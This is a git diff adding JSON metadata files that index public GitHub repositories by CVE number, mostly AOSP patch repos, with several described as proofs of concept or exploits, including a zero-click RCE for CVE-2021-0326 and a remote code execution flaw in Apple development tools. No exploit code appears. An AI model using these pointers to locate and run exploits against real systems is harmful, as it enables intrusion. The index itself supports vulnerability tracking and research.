{ + "id": 284798243, + "name": "Zoom-dll-hijacking", + "full_name": "shubham0d\/Zoom-dll-hijacking", + "owner": { + "login": "shubham0d", + "id": 12750163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4", + "html_url": "https:\/\/github.com\/shubham0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shubham0d\/Zoom-dll-hijacking", + "description": "A dll hijacking vulnerability in zoom meeting < 5.1.4. CVE-2020-9767", + "fork": false, + "created_at": "2020-08-03T20:17:10Z", + "updated_at": "2024-08-12T20:04:24Z", + "pushed_at": "2020-09-30T20:14:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "dll-hijacking", + "vulnerability", + "zoom" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9802.json b/2020/CVE-2020-9802.json new file mode 100644 index 0000000000..819adc2416 --- /dev/null +++ b/2020/CVE-2020-9802.json @@ -0,0 +1,33 @@ +[ + { + "id": 712457208, + "name": "CVE-2020-9802", + "full_name": "khcujw\/CVE-2020-9802", + "owner": { + "login": "khcujw", + "id": 129272364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129272364?v=4", + "html_url": "https:\/\/github.com\/khcujw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khcujw\/CVE-2020-9802", + "description": null, + "fork": false, + "created_at": "2023-10-31T14:05:32Z", + "updated_at": "2024-07-19T22:55:35Z", + "pushed_at": "2023-10-31T14:09:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9922.json b/2020/CVE-2020-9922.json new file mode 100644 index 0000000000..5117449369 --- /dev/null +++ b/2020/CVE-2020-9922.json @@ -0,0 +1,33 @@ +[ + { + "id": 354064477, + "name": "Fix-Apple-Mail-CVE-2020-9922", + "full_name": "Wowfunhappy\/Fix-Apple-Mail-CVE-2020-9922", + "owner": { + "login": "Wowfunhappy", + "id": 4484096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4484096?v=4", + "html_url": "https:\/\/github.com\/Wowfunhappy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wowfunhappy\/Fix-Apple-Mail-CVE-2020-9922", + "description": null, + "fork": false, + "created_at": "2021-04-02T15:51:03Z", + "updated_at": "2022-02-17T01:38:37Z", + "pushed_at": "2021-08-09T01:01:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9934.json b/2020/CVE-2020-9934.json new file mode 100644 index 0000000000..c84dd3cfb3 --- /dev/null +++ b/2020/CVE-2020-9934.json @@ -0,0 +1,33 @@ +[ + { + "id": 283028117, + "name": "CVE-2020-9934", + "full_name": "mattshockl\/CVE-2020-9934", + "owner": { + "login": "mattshockl", + "id": 5934002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5934002?v=4", + "html_url": "https:\/\/github.com\/mattshockl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mattshockl\/CVE-2020-9934", + "description": "CVE-2020–9934 POC", + "fork": false, + "created_at": "2020-07-27T22:09:01Z", + "updated_at": "2024-01-29T10:25:37Z", + "pushed_at": "2020-07-28T16:39:20Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 20, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9992.json b/2020/CVE-2020-9992.json new file mode 100644 index 0000000000..002caca1cc --- /dev/null +++ b/2020/CVE-2020-9992.json @@ -0,0 +1,33 @@ +[ + { + "id": 296170343, + "name": "c0ntextomy", + "full_name": "c0ntextomy\/c0ntextomy", + "owner": { + "login": "c0ntextomy", + "id": 71413975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71413975?v=4", + "html_url": "https:\/\/github.com\/c0ntextomy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0ntextomy\/c0ntextomy", + "description": "CVE-2020-9992 - A design flaw in MobileDevice.framework\/Xcode and iOS\/iPadOS\/tvOS Development Tools allows an attacker in the same network to gain remote code execution on a target device", + "fork": false, + "created_at": "2020-09-16T23:35:22Z", + "updated_at": "2024-01-04T16:50:21Z", + "pushed_at": "2020-09-23T14:52:06Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 65, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0302.json b/2021/CVE-2021-0302.json new file mode 100644 index 0000000000..6e40ba9243 --- /dev/null +++ b/2021/CVE-2021-0302.json @@ -0,0 +1,33 @@ +[ + { + "id": 494348960, + "name": "packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302", + "full_name": "ShaikUsaf\/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302", + "description": null, + "fork": false, + "created_at": "2022-05-20T06:33:47Z", + "updated_at": "2022-05-20T06:41:39Z", + "pushed_at": "2022-05-20T06:42:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0306.json b/2021/CVE-2021-0306.json new file mode 100644 index 0000000000..dedf1b0255 --- /dev/null +++ b/2021/CVE-2021-0306.json @@ -0,0 +1,33 @@ +[ + { + "id": 484710924, + "name": "framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317", + "description": null, + "fork": false, + "created_at": "2022-04-23T10:05:37Z", + "updated_at": "2022-04-23T10:29:35Z", + "pushed_at": "2022-04-23T10:29:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0308.json b/2021/CVE-2021-0308.json new file mode 100644 index 0000000000..2b9ec2abc7 --- /dev/null +++ b/2021/CVE-2021-0308.json @@ -0,0 +1,33 @@ +[ + { + "id": 496115451, + "name": "platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308", + "full_name": "Trinadh465\/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308", + "description": null, + "fork": false, + "created_at": "2022-05-25T06:50:30Z", + "updated_at": "2022-05-25T06:57:38Z", + "pushed_at": "2022-05-25T06:58:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0313.json b/2021/CVE-2021-0313.json new file mode 100644 index 0000000000..0b80ca34ac --- /dev/null +++ b/2021/CVE-2021-0313.json @@ -0,0 +1,33 @@ +[ + { + "id": 486862367, + "name": "frameworks_minikin_AOSP10_r33_CVE-2021-0313", + "full_name": "Satheesh575555\/frameworks_minikin_AOSP10_r33_CVE-2021-0313", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_minikin_AOSP10_r33_CVE-2021-0313", + "description": null, + "fork": false, + "created_at": "2022-04-29T06:30:27Z", + "updated_at": "2022-04-29T06:32:35Z", + "pushed_at": "2022-04-29T06:32:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0314.json b/2021/CVE-2021-0314.json new file mode 100644 index 0000000000..4bdc3f2c55 --- /dev/null +++ b/2021/CVE-2021-0314.json @@ -0,0 +1,33 @@ +[ + { + "id": 480331860, + "name": "framework_base_AOSP10_r33_CVE-2021-0314", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0314", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0314", + "description": null, + "fork": false, + "created_at": "2022-04-11T10:29:13Z", + "updated_at": "2022-04-11T10:38:39Z", + "pushed_at": "2022-04-11T10:38:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0315.json b/2021/CVE-2021-0315.json new file mode 100644 index 0000000000..1a07e3ea05 --- /dev/null +++ b/2021/CVE-2021-0315.json @@ -0,0 +1,95 @@ +[ + { + "id": 485741223, + "name": "framework_base_AOSP10_r33_CVE-2021-0315", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0315", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0315", + "description": null, + "fork": false, + "created_at": "2022-04-26T10:38:35Z", + "updated_at": "2022-04-26T11:02:43Z", + "pushed_at": "2022-04-26T11:44:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485782626, + "name": "frameworks_base_Aosp10_r33_CVE-2021-0315", + "full_name": "pazhanivel07\/frameworks_base_Aosp10_r33_CVE-2021-0315", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_Aosp10_r33_CVE-2021-0315", + "description": null, + "fork": false, + "created_at": "2022-04-26T12:46:33Z", + "updated_at": "2023-03-27T01:47:17Z", + "pushed_at": "2022-04-26T13:07:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486051891, + "name": "frameworks_base1_CVE-2021-0315", + "full_name": "nanopathi\/frameworks_base1_CVE-2021-0315", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/frameworks_base1_CVE-2021-0315", + "description": null, + "fork": false, + "created_at": "2022-04-27T05:01:30Z", + "updated_at": "2022-04-27T05:22:34Z", + "pushed_at": "2023-09-21T09:44:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0316.json b/2021/CVE-2021-0316.json new file mode 100644 index 0000000000..ed39d6ae8b --- /dev/null +++ b/2021/CVE-2021-0316.json @@ -0,0 +1,33 @@ +[ + { + "id": 481215106, + "name": "system_bt_AOSP_10_r33_CVE-2021-0316", + "full_name": "Satheesh575555\/system_bt_AOSP_10_r33_CVE-2021-0316", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/system_bt_AOSP_10_r33_CVE-2021-0316", + "description": null, + "fork": false, + "created_at": "2022-04-13T12:51:46Z", + "updated_at": "2023-08-29T15:54:45Z", + "pushed_at": "2022-04-13T12:54:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0318.json b/2021/CVE-2021-0318.json new file mode 100644 index 0000000000..b9408699a4 --- /dev/null +++ b/2021/CVE-2021-0318.json @@ -0,0 +1,33 @@ +[ + { + "id": 484744433, + "name": "frameworks_native_AOSP10_r33_CVE-2021-0318", + "full_name": "nanopathi\/frameworks_native_AOSP10_r33_CVE-2021-0318", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/frameworks_native_AOSP10_r33_CVE-2021-0318", + "description": null, + "fork": false, + "created_at": "2022-04-23T12:43:31Z", + "updated_at": "2022-04-23T12:48:06Z", + "pushed_at": "2022-04-23T12:48:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0319.json b/2021/CVE-2021-0319.json new file mode 100644 index 0000000000..d057b65158 --- /dev/null +++ b/2021/CVE-2021-0319.json @@ -0,0 +1,33 @@ +[ + { + "id": 482789876, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0319", + "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0319", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0319", + "description": null, + "fork": false, + "created_at": "2022-04-18T09:31:22Z", + "updated_at": "2023-03-27T01:30:11Z", + "pushed_at": "2022-04-18T09:35:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0325.json b/2021/CVE-2021-0325.json new file mode 100644 index 0000000000..bc1c2d0b15 --- /dev/null +++ b/2021/CVE-2021-0325.json @@ -0,0 +1,33 @@ +[ + { + "id": 476747255, + "name": "external_libavc_AOSP10_r33_CVE-2021-0325", + "full_name": "nanopathi\/external_libavc_AOSP10_r33_CVE-2021-0325", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/external_libavc_AOSP10_r33_CVE-2021-0325", + "description": null, + "fork": false, + "created_at": "2022-04-01T14:11:58Z", + "updated_at": "2022-04-18T09:32:07Z", + "pushed_at": "2023-02-28T07:12:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0326.json b/2021/CVE-2021-0326.json new file mode 100644 index 0000000000..475b98dce6 --- /dev/null +++ b/2021/CVE-2021-0326.json @@ -0,0 +1,157 @@ +[ + { + "id": 449055330, + "name": "skeleton", + "full_name": "aemmitt-ns\/skeleton", + "owner": { + "login": "aemmitt-ns", + "id": 51972960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972960?v=4", + "html_url": "https:\/\/github.com\/aemmitt-ns", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aemmitt-ns\/skeleton", + "description": "Skeleton (but pronounced like Peloton): A Zero-Click RCE exploit for CVE-2021-0326", + "fork": false, + "created_at": "2022-01-17T21:35:19Z", + "updated_at": "2024-08-12T20:19:50Z", + "pushed_at": "2022-03-16T02:58:42Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485818095, + "name": "wpa_supplicant_8_CVE-2021-0326.", + "full_name": "nanopathi\/wpa_supplicant_8_CVE-2021-0326.", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/wpa_supplicant_8_CVE-2021-0326.", + "description": null, + "fork": false, + "created_at": "2022-04-26T14:19:31Z", + "updated_at": "2022-04-26T14:29:01Z", + "pushed_at": "2022-04-26T14:29:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485823302, + "name": "external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326", + "full_name": "Satheesh575555\/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326", + "description": null, + "fork": false, + "created_at": "2022-04-26T14:33:04Z", + "updated_at": "2023-09-15T18:30:40Z", + "pushed_at": "2022-04-26T14:34:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485826624, + "name": "Packages_wpa_supplicant8_CVE-2021-0326", + "full_name": "nanopathi\/Packages_wpa_supplicant8_CVE-2021-0326", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/Packages_wpa_supplicant8_CVE-2021-0326", + "description": null, + "fork": false, + "created_at": "2022-04-26T14:41:51Z", + "updated_at": "2022-04-26T15:02:31Z", + "pushed_at": "2022-04-26T15:05:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486940425, + "name": "external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326", + "full_name": "ShaikUsaf\/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326", + "description": null, + "fork": false, + "created_at": "2022-04-29T11:05:51Z", + "updated_at": "2022-04-29T11:10:13Z", + "pushed_at": "2022-04-29T11:10:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0327.json b/2021/CVE-2021-0327.json new file mode 100644 index 0000000000..c450f158de --- /dev/null +++ b/2021/CVE-2021-0327.json @@ -0,0 +1,33 @@ +[ + { + "id": 484631242, + "name": "framework_base_AOSP10_r33_CVE-2021-0327", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0327", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0327", + "description": null, + "fork": false, + "created_at": "2022-04-23T03:01:52Z", + "updated_at": "2022-04-23T04:47:32Z", + "pushed_at": "2022-04-23T04:46:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0328.json b/2021/CVE-2021-0328.json new file mode 100644 index 0000000000..5d4b92b9ca --- /dev/null +++ b/2021/CVE-2021-0328.json @@ -0,0 +1,33 @@ +[ + { + "id": 486508581, + "name": "packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328", + "full_name": "ShaikUsaf\/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328", + "description": null, + "fork": false, + "created_at": "2022-04-28T08:28:31Z", + "updated_at": "2022-04-28T08:34:44Z", + "pushed_at": "2022-04-28T08:35:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0329.json b/2021/CVE-2021-0329.json new file mode 100644 index 0000000000..cec43cb5a0 --- /dev/null +++ b/2021/CVE-2021-0329.json @@ -0,0 +1,33 @@ +[ + { + "id": 486512388, + "name": "packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329", + "full_name": "ShaikUsaf\/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329", + "description": null, + "fork": false, + "created_at": "2022-04-28T08:41:00Z", + "updated_at": "2022-07-19T14:45:30Z", + "pushed_at": "2022-04-28T08:44:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0330.json b/2021/CVE-2021-0330.json new file mode 100644 index 0000000000..b8b1fe78c5 --- /dev/null +++ b/2021/CVE-2021-0330.json @@ -0,0 +1,33 @@ +[ + { + "id": 476240143, + "name": "system_core_AOSP10_r33-CVE-2021-0330", + "full_name": "Satheesh575555\/system_core_AOSP10_r33-CVE-2021-0330", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/system_core_AOSP10_r33-CVE-2021-0330", + "description": null, + "fork": false, + "created_at": "2022-03-31T09:36:07Z", + "updated_at": "2022-03-31T09:39:44Z", + "pushed_at": "2022-03-31T09:40:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0331.json b/2021/CVE-2021-0331.json new file mode 100644 index 0000000000..79813a5bf4 --- /dev/null +++ b/2021/CVE-2021-0331.json @@ -0,0 +1,33 @@ +[ + { + "id": 481851030, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0331", + "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0331", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0331", + "description": null, + "fork": false, + "created_at": "2022-04-15T05:45:49Z", + "updated_at": "2023-03-27T01:34:20Z", + "pushed_at": "2022-04-18T10:45:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0332.json b/2021/CVE-2021-0332.json new file mode 100644 index 0000000000..e404d7d802 --- /dev/null +++ b/2021/CVE-2021-0332.json @@ -0,0 +1,33 @@ +[ + { + "id": 483117532, + "name": "frameworks_native_AOSP10_r33_CVE-2021-0332", + "full_name": "Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2021-0332", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2021-0332", + "description": null, + "fork": false, + "created_at": "2022-04-19T06:06:57Z", + "updated_at": "2023-03-27T01:39:42Z", + "pushed_at": 